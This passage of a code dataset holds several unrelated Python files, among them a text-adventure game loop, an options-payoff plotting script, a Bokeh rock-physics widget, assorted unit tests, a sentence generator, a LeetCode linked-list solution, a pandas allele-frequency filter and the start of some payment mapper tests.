titleScreen():\n    # prints the title of the game.\n    print(gm_map.TITLE1) \n    print()\n    print(gm_map.TITLE2)\n    time.sleep(SLEEPTIMER * 2)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #                 Main function                   #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef main():\n    # Starts the game, calls the game loop\n    titleScreen() # print the title of the game. \n    \n    # Setting the game up\n    gameState = Gamestate() # Set up gamestate object\n    setPayexMode(gameState) # Can be commented out to remove payex functionality.\n    enterDifficulty(gameState) # Set up difficulty\n    enterPlayerName(gameState) # Set up the new player. This will also print prompts and player information to the player.\n    setPlayerAttributes(gameState) # Set player attributes based on the stats set in the previous function.\n    \n    # Game is set up, print map info and introduction text. 
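\n    # [Editorial note] At this point gameState already carries the\n    # difficulty-dependent attribute budget chosen in enterDifficulty()\n    # (easy=10, medium=6, hard=4, plus the god/debug modes above) and a fully\n    # initialised player, so the calls below only render state and then hand\n    # control over to gameLoop().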
\n    gameState.map.drawMap(gameState) # Draw the map on the screen.\n    gm_map.printThis(gameState.scenario[\"intro\"])\n    time.sleep(SLEEPTIMER * 1)\n    gameState.map.whatToDo(gameState) # Start the first \"what would you like to do\" dialogue before entering the game loop.\n    \n    # Move on to the game loop\n    gameLoop(gameState)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #                  Game loop                      #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef gameLoop(gameState):\n    # Main game loop\n    while True:\n        if gameState.gameIsDone == True:\n            # If all scenarios are complete, print a message stating that you are done, but can continue playing for fun.\n            print(gm_scenarios.ENDING_MSG)\n            gameState.gameIsDone = False\n\n        if gameState.map.victory == True and gameState.player.inCombat == False:\n            # Check if the victory conditions are met, start prep for the next scenario and print game ending messages.\n            if gameState.map.specialItemFound == False:\n                gm_items.specialItemFound(gameState) # if the special item is not found yet, the player receives it at the end of the scenario\n            gm_map.printThis(gameState.scenario[\"ending\"])\n            time.sleep(SLEEPTIMER * 4)\n            print(gm_scenarios.VICTORY) # print victory ascii art\n            time.sleep(SLEEPTIMER * 4)\n            nextScenario(gameState) # start a new scenario.\n\n        if gameState.player.inCombat == True:\n            # Before starting map movement check if the player is in combat, if so, call the combat loop.\n            gm_combat.combatLoop(gameState)\n        \n        # Movement loop\n        gameState.map.drawMap(gameState) # draw the map\n        gameState.map.whatToDo(gameState) # ask the player what to do\n        \n        if gameState.player.inCombat == True:\n            # check if the player is in combat after movement.\n            gm_combat.combatLoop(gameState) \n        \n        if gameState.player.dead == True: # if the player is dead, print game over, and ask if you want to play again.\n            gm_scenarios.gameOver()\n    \n    print(\"# Game loop has ended.\") # Print that the application is out of the loop, meant for debug purposes.\n\nif (__name__ == \"__main__\"):\n    main()\n","repo_name":"Vansalot/ForanN","sub_path":"FnN/gm_gameloop.py","file_name":"gm_gameloop.py","file_ext":"py","file_size_in_byte":11822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18804290892","text":"import numpy as np\nimport matplotlib.pyplot as plt\nS= np.linspace(1,1,140)\ndef calculate(T,S,K,sigma,r):\n    T=float(T)\n    S=float(S)\n    K=float(K)\n    sigma=float(sigma)\n    r=float(r)\n    C=max(S-K,0)\n    P=max(K-S,0)\n    return C,P\nT=1\nS=0\nsigma=0.3\nr=0.12\ndef plot_graphs():\n    X=[]\n    Y0_1=[]\n    Y0_2=[]\n    Y0_3=[]\n    Y1_1=[]\n    Y1_2=[]\n    Y1_3=[]\n    Y1_4=[]\n\n    Y=[]\n    for i in range(140):\n        C1,P1=calculate(T,i+1,20,sigma,r)\n        C2,P2=calculate(T,i+1,40,sigma,r)\n        C3,P3=calculate(T,i+1,60,sigma,r)\n        C4,P4=calculate(T,i+1,80,sigma,r)\n        Y0_1.append(C2/20)\n        Y0_2.append(-1*C3/20)\n        Y0_3.append((C2-C3)/20)\n        Y1_1.append(C1/20)\n        Y1_2.append(-C2/20)\n        Y1_3.append(-C3/20)\n        Y1_4.append(C4/20)\n        Y.append((C1+C4-C2-C3)/20)\n        X.append(i+1)\n    plt.figure()\n    plt.title('')\n    plt.plot(X,Y0_1,linestyle='dashed',color='palevioletred')\n    plt.plot(X,Y0_2,linestyle='dashed',color='lightseagreen')\n    plt.plot(X,Y0_3,linestyle='solid',color='limegreen')\n    plt.xlabel('Stock Price at expiry')\n    plt.ylabel('Payoff')\n    plt.grid('on')\n    plt.legend(['Long Call at strike $40','Short Call at strike $60','Net Payoff'])\n    plt.show()\n\n    plt.figure()\n    plt.title('')\n    plt.plot(X,Y1_1,linestyle='dashed',color='mediumslateblue')\n    plt.plot(X,Y1_2,linestyle='dashed',color='palevioletred')\n    
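# [Editorial note, hedged] The four legs in this figure form a long call\n    # condor: long the 20 and 80 strikes, short the 40 and 60 strikes. The net\n    # payoff Y = (C1 + C4 - C2 - C3) / 20 is 0 below S=20 and above S=80 and\n    # is capped at (40 - 20) / 20 = 1 between the short strikes, e.g. at S=50:\n    # ((50 - 20) + 0 - (50 - 40) - 0) / 20 = 1.\n    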
plt.plot(X,Y1_3,linestyle='dashed',color='lightseagreen')\n plt.plot(X,Y1_4,linestyle='dashed',color='plum')\n plt.plot(X,Y,linestyle='solid',color='limegreen')\n plt.xlabel('Stock Price at expiry')\n plt.ylabel('Payoff')\n plt.grid('on')\n plt.legend(['Long Call at strike $20','Short Call at strike $40','Short Call at strike $60','Long Call at strike $80','Net Payoff'],loc=4)\n plt.show()\nif __name__=='__main__':\n plot_graphs()\n\n\n","repo_name":"mahekvora21/JPMC_Case_Study","sub_path":"MAHEK_VORA_CASE_STUDY_A_Q5_AB_MAIN.py","file_name":"MAHEK_VORA_CASE_STUDY_A_Q5_AB_MAIN.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28520549364","text":"###############################################################################\n\n# Author: Antony Hallam\n# Company: HWU\n# Date: 22-9-2018\n\n# File Name: dims.py\n\n# Synopsis:\n# Class to handle interactive selection of data models in geopy.\n# DIMS - Data Input Manager & Selector\n\n###############################################################################\n\nfrom collections import OrderedDict\n\nclass ExtOrderedDict(OrderedDict):\n\n def __init__(self):\n super(ExtOrderedDict,self).__init__()\n\n def keyslist(self):\n return list(self.keys())\n\nimport numpy as np\nimport pandas as pd\n\nfrom bokeh.layouts import row, column\nfrom bokeh.models import TableColumn, DataTable, ColumnDataSource, Panel, Tabs\nfrom bokeh.models.widgets import Slider, Select, Div\n\nfrom data.structLith import structRock, structMineral, structFluid, structDryFrame\n#from func.funcRP import calcDryFrame_dPres, calcVelp, calcVels, gassmann_dry2fluid, mixfluid\n\nclass widgetDIMS(object):\n\n column_names_rocks = ['kclay', 'muclay', 'rhoclay',\n 'knonclay', 'munonclay', 'rhononclay',\n 'vclay', 'phi', 'dryEk', 'dryPk', 'dryEg', 'dryPg']\n column_names_fluids = ['Name', 'ko', 'rhoo', 'kw', 'rhow', 'kg', 'rhog', 'so', 'sw', 'sg' ]\n column_names_pres = ['Name', 'OB_Grad', 'init_Pres', 'curr_Pres']\n column_names_output = ['rock', 'fluid', 'Vp', 'Vs', 'rho', 'other']\n\n def __init__(self,init_depth,file_rocks,file_fluids,file_prespfs,fdi=None):\n '''\n :param init_depth: Initial depth to model (TVDSS).\n :param file_rocks: File with input mineral parameters.\n :param file_fluids: File with input fluid parameters.\n :param file_prespfs: File with input pressure profiles.\n :keyword dependents: A list of geoPy widgets which need to be updated when widgetDIMS is changed.\n '''\n # Initial Data\n self.df_rocks = pd.read_csv(file_rocks, skipinitialspace=True)\n self.df_fluids = pd.read_csv(file_fluids, skipinitialspace=True)\n self.df_pres = pd.read_csv(file_prespfs, skipinitialspace=True)\n self.init_depth = init_depth # mTVDSS\n self.pagewidth = 1000 # pixels\n self.fdi = fdi\n\n # Setup Sources\n self.CDS_rocks = ColumnDataSource(self.df_rocks)\n self.CDS_fluids = ColumnDataSource(self.df_fluids)\n self.CDS_pres = ColumnDataSource(self.df_pres)\n self.CDS_out = ColumnDataSource(data=dict())\n # Extract Names\n self.odict_rocks = self.__odictIndex(self.df_rocks.Name.tolist())\n self.odict_fluids = self.__odictIndex(self.df_fluids.Name.tolist())\n self.odict_pres = self.__odictIndex(self.df_pres.Name.tolist())\n # Setup widgets\n self.createTableWidgets()\n self.createControls()\n self.createLayout()\n\n self.on_selection_change('value',1,1)\n\n def __odictIndex(self,keys):\n out = ExtOrderedDict()\n for ind,key in enumerate(keys):\n out[key] = ind\n return 
out\n\n def createTableWidgets(self):\n self.col_rocks = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_rocks]\n self.col_fluids = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_fluids]\n self.col_pres = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_pres]\n self.col_out = [TableColumn(field=Ci, title=Ci) for Ci in self.column_names_output]\n #Setup table widgets\n tablekwargs = {'width': self.pagewidth, 'editable': True}\n self.TW_rocks = DataTable(source=self.CDS_rocks, columns=self.col_rocks, **tablekwargs)\n self.TW_fluids = DataTable(source=self.CDS_fluids, columns=self.col_fluids, **tablekwargs)\n self.TW_pres = DataTable(source=self.CDS_pres, columns=self.col_pres, **tablekwargs)\n self.TW_out = DataTable(source=self.CDS_out, columns=self.col_out, **tablekwargs)\n\n def createControls(self):\n # Setup Select Panes and Input Widgets\n\n #Obr - Overburden rock #ResR - Reservoir rock\n #Obf - Overburden fluid #Resf - Reservoir fluid\n self.selectObr = Select(value=self.odict_rocks.keyslist()[0], options=self.odict_rocks.keyslist(),\n title=\"Rock Model\")\n self.selectResR = Select(value=self.odict_rocks.keyslist()[0], options=self.odict_rocks.keyslist(),\n title=\"Rock Model\")\n self.selectObf = Select(value=self.odict_fluids.keyslist()[0], options=self.odict_fluids.keyslist(),\n title=\"Fluid Model\")\n self.selectResf = Select(value=self.odict_fluids.keyslist()[0], options=self.odict_fluids.keyslist(),\n title=\"Fluid Model\")\n self.selectPres = Select(value=self.odict_pres.keyslist()[0], options=self.odict_pres.keyslist(),\n title=\"Pressure Scenario\")\n\n self.slideDepth = Slider(start=0, end=10000, value=self.init_depth, step=10, title='Depth (TVDSS)',\n callback_policy='mouseup')\n\n self.selectObr.on_change('value', self.on_selection_change)\n self.selectResR.on_change('value', self.on_selection_change)\n self.selectObf.on_change('value', self.on_selection_change)\n self.selectResf.on_change('value', self.on_selection_change)\n self.selectPres.on_change('value', self.on_selection_change)\n self.slideDepth.on_change('value', self.on_selection_change)\n\n def createLayout(self):\n # Layout of Page\n self.inputTab1 = Panel(child=self.TW_rocks, title='Rock Models')\n self.inputTab2 = Panel(child=self.TW_fluids, title='Fluid Mixes')\n self.inputTab3 = Panel(child=self.TW_pres, title='Pressure Scenarios')\n self.inputTab4 = Panel(child=self.TW_out, title='Model Calculations')\n\n self.inputTabs = Tabs(tabs=[self.inputTab1, self.inputTab2,\n self.inputTab3, self.inputTab4],\n width=self.pagewidth, height=200)\n\n textrowob = Div(text=\"

Overburden:\")\n selectrowob = row(self.selectObr, self.selectObf, width=500, height=50, sizing_mode=\"scale_both\")\n textrowres = Div(text=\"

Reservoir:\")\n selectrowres = row(self.selectResR, self.selectResf, width=500, height=50, sizing_mode=\"scale_both\")\n selectrowpres = row(self.selectPres, self.slideDepth, width=500, height=50, sizing_mode=\"scale_both\")\n self.layout = column(self.inputTabs,\n textrowob,\n selectrowob,\n textrowres,\n selectrowres,\n selectrowpres, width=self.pagewidth)\n\n def on_selection_change(self,attribute,old,new):\n # update active selections\n self.activeObr = self.df_rocks.loc[self.odict_rocks[self.selectObr.value]] #Overburden Rock and Fluid\n self.activeObf = self.df_fluids.loc[self.odict_fluids[self.selectObf.value]]\n self.activeResR = self.df_rocks.loc[self.odict_rocks[self.selectResR.value]] #Reservoir Rock and Fluid\n self.activeResF = self.df_fluids.loc[self.odict_fluids[self.selectResf.value]]\n self.activePresPf = self.df_pres.loc[self.odict_pres[self.selectPres.value]] #Pressure Profile\n self.cur_depth = self.slideDepth.value\n self.updateRocks()\n self.updateFluids()\n self.updateRockModel()\n if self.fdi is not None:\n self.fdi.updateModel(self.activeResR_dry, self.activeResF_mix, self.fdi.min_pres, self.fdi.max_pres,\n init_imp=self.activeResRM.pimp)\n\n def updateRocks(self):\n #update rock models based upon selections\n parnonclay = ['knonclay', 'munonclay', 'rhononclay'];\n parclay = ['kclay', 'muclay', 'rhoclay']\n obnonshale = structMineral('nonshale', *[self.activeObr[par] for par in parnonclay])\n obshale = structMineral('shale', *[self.activeObr[par] for par in parclay])\n nonshale = structMineral('nonshale', *[self.activeResR[par] for par in parnonclay])\n shale = structMineral('shale', *[self.activeResR[par] for par in parclay])\n # output rock names to table\n self.CDS_out.data['rock'] = [self.activeObr['Name'], self.activeResR['Name']]\n\n #update dryrock properties\n self.activeObr_dry = structDryFrame(self.activeObr['Name'], obnonshale, obshale, self.activeObr['vclay'],\n self.activeObr['phi'])\n self.activeResR_dry = structDryFrame(self.activeResR['Name'], nonshale, shale, self.activeResR['vclay'],\n self.activeResR['phi'])\n self.activeObr_dry.calcRockMatrix(); self.activeResR_dry.calcRockMatrix()\n parp = ['init_Pres', 'curr_Pres']; pardry = ['dryEk', 'dryPk', 'dryEg', 'dryPg']\n self.activeObr_dry.calcDryFrame(self.activePresPf['OB_Grad'], self.cur_depth, *[self.activePresPf[par] for par in parp],\n *[self.activeObr[par] for par in pardry])\n self.activeResR_dry.calcDryFrame(self.activePresPf['OB_Grad'], self.cur_depth, *[self.activePresPf[par] for par in parp],\n *[self.activeResR[par] for par in pardry])\n\n def updateFluids(self):\n # oil, water, gas, setup and mixing\n parw = ['kw', 'rhow', 'sw']; paro = ['ko', 'rhoo', 'so']; parg = ['kg', 'rhog', 'sg']\n self.activeObf_mix = structFluid(self.activeObf['Name'], water=[self.activeObf[ind] for ind in parw],\n oil=[self.activeObf[ind] for ind in paro],\n gas=[self.activeObf[ind] for ind in parg])\n self.activeResF_mix = structFluid(self.activeResF['Name'], water=[self.activeResF[ind] for ind in parw],\n oil=[self.activeResF[ind] for ind in paro],\n gas=[self.activeResF[ind] for ind in parg])\n # output fluid names to table\n self.CDS_out.data['fluid'] = [self.activeObf['Name'], self.activeResF['Name']]\n\n\n def updateRockModel(self):\n\n # calculate rock models and properties\n self.activeObrM = structRock(self.activeObr_dry, self.activeObf_mix)\n self.activeObrM.calcGassmann(); self.activeObrM.calcDensity(); self.activeObrM.calcElastic()\n self.activeResRM = structRock(self.activeResR_dry, self.activeResF_mix)\n 
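# As with the overburden rock above, run Gassmann fluid substitution, then derive density and elastic properties for the reservoir rock (comment added for clarity).\n 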
self.activeResRM.calcGassmann(); self.activeResRM.calcDensity(); self.activeResRM.calcElastic()\n\n # output rockproperties to table\n self.CDS_out.data['Vp'] = [self.activeObrM.velp, self.activeResRM.velp]\n self.CDS_out.data['Vs'] = [self.activeObrM.vels, self.activeResRM.vels]\n self.CDS_out.data['rho'] = [self.activeObrM.den, self.activeResRM.den]\n self.CDS_out.data['other'] = [self.activeObrM.pimp, self.activeResRM.pimp]\n\nif __name__ == \"__main__\":\n from os.path import dirname, join, split\n from os import getcwd\n from bokeh.io import show\n\n #setup figure variables\n idepth = 3180 # mTVDSS\n\n print('before')\n if split(getcwd())[-1] == 'layouts':\n inputs = join('..','inputs')\n elif split(getcwd())[-1] == 'geoPy':\n inputs = 'inputs'\n else:\n raise SystemError\n print(\"Can't run from this file from: \"+getcwd())\n\n print('after')\n fr = join(dirname(__file__),inputs,'geoPy_rocks.csv')\n ff = join(dirname(__file__),inputs,'geoPy_fluids.csv')\n fp = join(dirname(__file__),inputs,'geoPy_pres.csv')\n\n dims = widgetDIMS(idepth,fr,ff,fp)\n show(dims.TW_rocks)\n\n\n\n\n\n\n","repo_name":"trhallam/geoPy","sub_path":"layouts/dims.py","file_name":"dims.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"30771065149","text":"import unittest\nfrom unittest.mock import MagicMock, patch, call\n\nfrom controlling.AsyncProcessor import AsyncProcessor\n\n_EXCEPTION_TEXT = \"something horrible went wrong\"\n\n\nclass AsyncProcessorTest(unittest.TestCase):\n def test_enqueue_submits_action_to_ThreadPool(self):\n thread_pool_mock = MagicMock()\n asyncProcessor = AsyncProcessor(thread_pool_mock)\n\n asyncProcessor.enqueue(self._some_action)\n\n assert thread_pool_mock.submit.called\n\n @patch(\"builtins.print\", autospec=True, side_effect=print)\n def test_enqueue_prints_exception_if_action_raises_one(self, print_mock):\n thread_pool_mock = MagicMock()\n asyncProcessor = AsyncProcessor(thread_pool_mock)\n thread_pool_mock.submit = lambda action, parameter: action(parameter)\n\n asyncProcessor.enqueue(self._raise_exception)\n\n calls = [call(\"*** EXCEPTION IN THREAD ***\"), call(_EXCEPTION_TEXT)]\n print_mock.assert_has_calls(calls)\n\n def _raise_exception(self):\n raise Exception(_EXCEPTION_TEXT)\n\n def _some_action(self):\n print(\"hello world\")\n","repo_name":"wtjerry/hslu_pren","sub_path":"tests/AsyncProcessorTest.py","file_name":"AsyncProcessorTest.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34147875943","text":"import unittest\nfrom hw09 import UniversityLoader\n\n\n\"\"\"\nUnit test class.\n\"\"\"\n\n\nclass hw09test (unittest.TestCase):\n\n \"\"\"\n Tests if the student pretty table is correct.\n \"\"\"\n\n def test_student_table(self):\n\n # Expected value\n expected = [['10103', 'Baldwin, C', 'SFEN', [{'CS 501': 'B'}, {'SSW 564': 'A-'}, {'SSW 567': 'A'}, {'SSW 687': 'B'}]],\n ['10115', 'Wyatt, X', 'SFEN', [{'CS 545': 'A'}, {'SSW 564': 'B+'}, {'SSW 567': 'A'}, {'SSW 687': 'A'}]], ['10172', 'Forbes, I', 'SFEN', [{'SSW 555': 'A'}, {'SSW 567': 'A-'}]], ['10175', 'Erickson, D', 'SFEN', [{'SSW 564': 'A'}, {'SSW 567': 'A'}, {'SSW 687': 'B-'}]], [\n '10183', 'Chapman, O', 'SFEN', [{'SSW 689': 'A'}]], ['11399', 'Cordova, I', 'SYEN', [{'SSW 540': 'B'}]], ['11461', 'Wright, U', 'SYEN', [{'SYS 611': 'A'}, {'SYS 750': 'A-'}, {'SYS 800': 'A'}]], ['11658', 'Kelly, P', 'SYEN', 
[{'SSW 540': 'F'}]], ['11714', 'Morton, A', 'SYEN', [{'SYS 611': 'A'}, {'SYS 645': 'C'}]], ['11788', 'Fuller, E', 'SYEN', [{'SSW 540': 'A'}]]]\n university = UniversityLoader(\n path='files', name='Stevens') # Creates the university loader.\n\n # Actual value as in the pretty table.\n actual = university.get_table_data_student()\n self.assertEqual(expected, actual)\n\n \"\"\"\n Tests if the instructor pretty table is correct.\n \"\"\"\n\n def test_instructor_table(self):\n\n # Expected value.\n expected = [['98760', 'Darwin, C', 'SYEN', 'SYS 800', 1], ['98760', 'Darwin, C', 'SYEN', 'SYS 750', 1], ['98760', 'Darwin, C', 'SYEN', 'SYS 611', 2], ['98760', 'Darwin, C', 'SYEN', 'SYS 645', 1], ['98763', 'Newton, I', 'SFEN', 'SSW 555', 1], ['98763', 'Newton, I', 'SFEN', 'SSW 689', 1], [\n '98764', 'Feynman, R', 'SFEN', 'SSW 564', 3], ['98764', 'Feynman, R', 'SFEN', 'SSW 687', 3], ['98764', 'Feynman, R', 'SFEN', 'CS 501', 1], ['98764', 'Feynman, R', 'SFEN', 'CS 545', 1], ['98765', 'Einstein, A', 'SFEN', 'SSW 567', 4], ['98765', 'Einstein, A', 'SFEN', 'SSW 540', 3]]\n university = UniversityLoader(\n path='files', name='Stevens')\n # Actual value\n actual = university.get_table_data_instructors()\n self.assertEqual(expected, actual)\n\n \"\"\"\n Checks if the file not found is raised.\n \"\"\"\n\n def test_file_not_found(self):\n with self.assertRaises(FileNotFoundError):\n UniversityLoader(\n path='file', name='Stevens')\n\n \"\"\"\n Checks if the instructor or student is not present.\n \"\"\"\n\n def test_instructor_or_student_not_found(self):\n with self.assertRaises(KeyError):\n UniversityLoader(\n path='files_data_not_found', name='Stevens')\n\n \"\"\"\n Checks if all the files are correct.\n \"\"\"\n\n def test_wrong_no_of_fields(self):\n with self.assertRaises(ValueError):\n UniversityLoader(\n path='files_wrong_no_fileds', name='Stevens')\n\n \"\"\"\n Checks if any duplicate values are present in the files.\n \"\"\"\n\n def test_duplicate_student_instructors(self):\n with self.assertRaises(KeyError):\n UniversityLoader(\n path='files_duplicate', name='Stevens')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n","repo_name":"yashlimbasiya/Student-Repository","sub_path":"Student_Repository_TEST_Yash_Lambasiya.py","file_name":"Student_Repository_TEST_Yash_Lambasiya.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72844179432","text":"import random\n\n\ndef main():\n words = [\"boy\", \"girl\", \"cat\", \"dog\", \"bird\", \"house\"]\n word = random.choice(words)\n cap_word = word.capitalize()\n\n for _ in range(6):\n quantity = random.randint(1, 3)\n tense = random.choice([\"past\", \"present\", \"future\"])\n\n sentence = make_sentence(quantity, tense)\n print(sentence.capitalize())\n\n\ndef make_sentence(quantity, tense):\n determiner = get_determiner(quantity)\n adjective = get_adjective()\n adverb = get_adverb()\n noun = get_noun(quantity)\n verb = get_verb(quantity, tense)\n prepositional_phrase1 = get_prepositional_phrase(quantity)\n prepositional_phrase2 = get_prepositional_phrase(quantity)\n\n sentence = f\"{determiner} {adjective} {noun} {verb} {adverb} {prepositional_phrase1} {prepositional_phrase2}.\"\n return sentence\n\n\ndef get_determiner(quantity):\n if quantity == 1:\n determiners = [\"a\", \"one\", \"the\"]\n else:\n determiners = [\"some\", \"many\", \"the\"]\n\n determiner = random.choice(determiners)\n return determiner\n\n\ndef 
get_noun(quantity):\n if quantity == 1:\n nouns = [\"bird\", \"boy\", \"car\", \"cat\", \"child\",\n \"dog\", \"girl\", \"man\", \"rabbit\", \"woman\"]\n else:\n nouns = [\"birds\", \"boys\", \"cars\", \"cats\", \"children\",\n \"dogs\", \"girls\", \"men\", \"rabbits\", \"women\"]\n\n noun = random.choice(nouns)\n return noun\n\n\ndef get_verb(quantity, tense):\n if tense == \"past\":\n verbs = [\"drank\", \"ate\", \"grew\", \"laughed\", \"thought\",\n \"ran\", \"slept\", \"talked\", \"walked\", \"wrote\"]\n elif tense == \"present\" and quantity == 1:\n verbs = [\"drinks\", \"eats\", \"grows\", \"laughs\", \"thinks\",\n \"runs\", \"sleeps\", \"talks\", \"walks\", \"writes\"]\n elif tense == \"present\" and quantity != 1:\n verbs = [\"drink\", \"eat\", \"grow\", \"laugh\", \"think\",\n \"run\", \"sleep\", \"talk\", \"walk\", \"write\"]\n elif tense == \"future\":\n verbs = [\"will drink\", \"will eat\", \"will grow\", \"will laugh\", \"will think\",\n \"will run\", \"will sleep\", \"will talk\", \"will walk\", \"will write\"]\n else:\n print(\"Type the correct tense.\")\n return None\n\n verb = random.choice(verbs)\n return verb\n\n\ndef get_preposition():\n \"\"\"Return a randomly chosen preposition\n from this list of prepositions:\n \"about\", \"above\", \"across\", \"after\", \"along\",\n \"around\", \"at\", \"before\", \"behind\", \"below\",\n \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n \"from\", \"in\", \"into\", \"near\", \"of\",\n \"off\", \"on\", \"onto\", \"out\", \"over\",\n \"past\", \"to\", \"under\", \"with\", \"without\"\n\n Return: a randomly chosen preposition.\n \"\"\"\n prepositions = [\"about\", \"above\", \"across\", \"after\", \"along\",\n \"around\", \"at\", \"before\", \"behind\", \"below\",\n \"beyond\", \"by\", \"despite\", \"except\", \"for\",\n \"from\", \"in\", \"into\", \"near\", \"of\",\n \"off\", \"on\", \"onto\", \"out\", \"over\",\n \"past\", \"to\", \"under\", \"with\", \"without\"]\n\n preposition = random.choice(prepositions)\n return preposition\n\n\ndef get_prepositional_phrase(quantity):\n \"\"\"Build and return a prepositional phrase composed\n of three words: a preposition, a determiner, and a\n noun by calling the get_preposition, get_determiner,\n and get_noun functions.\n\n Parameter\n quantity: an integer that determines if the\n determiner and noun in the prepositional\n phrase returned from this function should\n be single or plural.\n Return: a prepositional phrase.\n \"\"\"\n preposition = get_preposition()\n determiner = get_determiner(quantity)\n noun = get_noun(quantity)\n\n prepositional_phrase = f\"{preposition} {determiner} {noun}\"\n return prepositional_phrase\n\n\ndef get_adjective():\n \"\"\"Return a randomly chosen adjective from a list of adjectives.\n\n Return: a randomly chosen adjective.\n \"\"\"\n adjectives = [\"beautiful\", \"smart\", \"funny\", \"tall\", \"brave\",\n \"kind\", \"friendly\", \"creative\", \"happy\", \"strong\"]\n\n adjective = random.choice(adjectives)\n return adjective\n\n\ndef get_adverb():\n \"\"\"Return a randomly chosen adverb from a list of adverbs.\n\n Return: a randomly chosen adverb.\n \"\"\"\n adverbs = [\"quickly\", \"carefully\", \"eagerly\", \"happily\", \"loudly\",\n \"gracefully\", \"patiently\", \"silently\", \"vigorously\", \"warmly\"]\n\n adverb = random.choice(adverbs)\n return 
adverb\n\n\nmain()\n","repo_name":"djhi12/programming_with_functions","sub_path":"week2/sentences.py","file_name":"sentences.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17367699080","text":"# Leetcode\n# 61. Rotate List\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def rotateRight(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if not head: \n return head\n \n current = tail = head\n\n length = 1\n while tail.next:\n length += 1\n tail = tail.next \n \n # handle case where k is bigger than the length of the list.\n k = k % length\n # handle case where k is equal to the length of the list. \n if k == 0: \n return head \n\n current = head\n for _ in range(length-k-1):\n current = current.next \n new_head = current.next # Split the linked list after pointer has been moved k times. new_head has the 2nd part of the linked list and current has the 1st part of the linked list. \n current.next = None # Set the EOL to the last element of the first list. \n tail.next = head # Join the head of the first linked list to the end of the second linked list. \n return new_head\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/61_RotateList.py","file_name":"61_RotateList.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8834801185","text":"import pandas as pd\nimport sys,os\nimport numpy as np\nsys.stdout.flush()\nfile = sys.argv[1]\ndf = pd.read_csv(file,index_col=0,header=0,sep=',')\nMAF = []\nfor i in range(0,df.shape[1]):\n\ttable = df.iloc[:,i].value_counts()\n\tif max(table) <= 383*0.95:\n\t\tMAF.append(df.columns[i])\n\ndf2 = df.loc[:,MAF]\n\nnum = df2.isna().sum()\nnum50 = num[num<=38]\nnum75 = num[num<=8]\nnum90 = num[num<=2]\ndf50 = df2.loc[:,num50.index]\ndf75 = df2.loc[:,num75.index]\ndf90 = df2.loc[:,num90.index]\ndf50.to_csv(file + '_50per',index=True, header=True,sep=\",\")\ndf75.to_csv(file + '_75per',index=True, header=True,sep=\",\")\ndf90.to_csv(file + '_90per',index=True, header=True,sep=\",\")\n\n","repo_name":"ShiuLab/Manuscript_Code","sub_path":"2023_Ath_multi-omics/Data_preprocessing/03_methylomic_matrix/2_single_site_methylation_P_A/14_keep_50_75_90_percentile_MAF.py","file_name":"14_keep_50_75_90_percentile_MAF.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"70113104232","text":"from input import *\r\nimport unittest\r\n\r\nclass TestPortObjects(unittest.TestCase):\r\n\r\n def test_port(self):\r\n ships, ports, containers, items = get_data()\r\n self.assertEqual(ports[0].current_ships, ships[:3])\r\n self.assertEqual(ports[1].load_item_to_container(ports[1].items[0], ports[1].containers[0]), '<-This Item was loaded in Container->')\r\n self.assertEqual(ports[1].load_item_to_container(ports[1].items[-2], ports[1].containers[0]), '<-This Item to heavy to load in Container->')\r\n\r\n def test_ship(self):\r\n ships, ports, containers, items = get_data()\r\n self.assertEqual(ships[0].sail_to(ports[0]), 'Ship already is in this port')\r\n self.assertEqual(ships[0].sail_to(ports[1]), '<-The Ship does\\'nt have enough fuel to sail->')\r\n ships[0].refuel(50000)\r\n self.assertEqual(ships[0].sail_to(ports[1]), '<-Ship 
starts going to new Port->')\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"TwoUfo/Patern_FEP21","sub_path":"Тисовський Олег/Patern-Lab-3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"170036719","text":"from dataclasses import asdict\n\nimport pytest\n\nfrom sendr_utils import alist, utcnow\n\nfrom mail.payments.payments.core.entities.arbitrage import Arbitrage, ArbitrageStatus\nfrom mail.payments.payments.storage.mappers.arbitrage import ArbitrageDataDumper, ArbitrageDataMapper\n\n\nclass TestArbitrageDataMapper:\n def test_map(self, arbitrage):\n row = {\n type(arbitrage).__name__ + '__' + key: value\n for key, value in asdict(arbitrage).items()\n }\n mapped = ArbitrageDataMapper()(row)\n assert mapped == arbitrage\n\n\nclass TestArbitrageDataDumper:\n def test_unmap(self, arbitrage):\n assert ArbitrageDataDumper()(arbitrage) == asdict(arbitrage)\n\n\nclass TestArbitrageMapper:\n @pytest.fixture\n def now(self, mocker):\n now = utcnow()\n 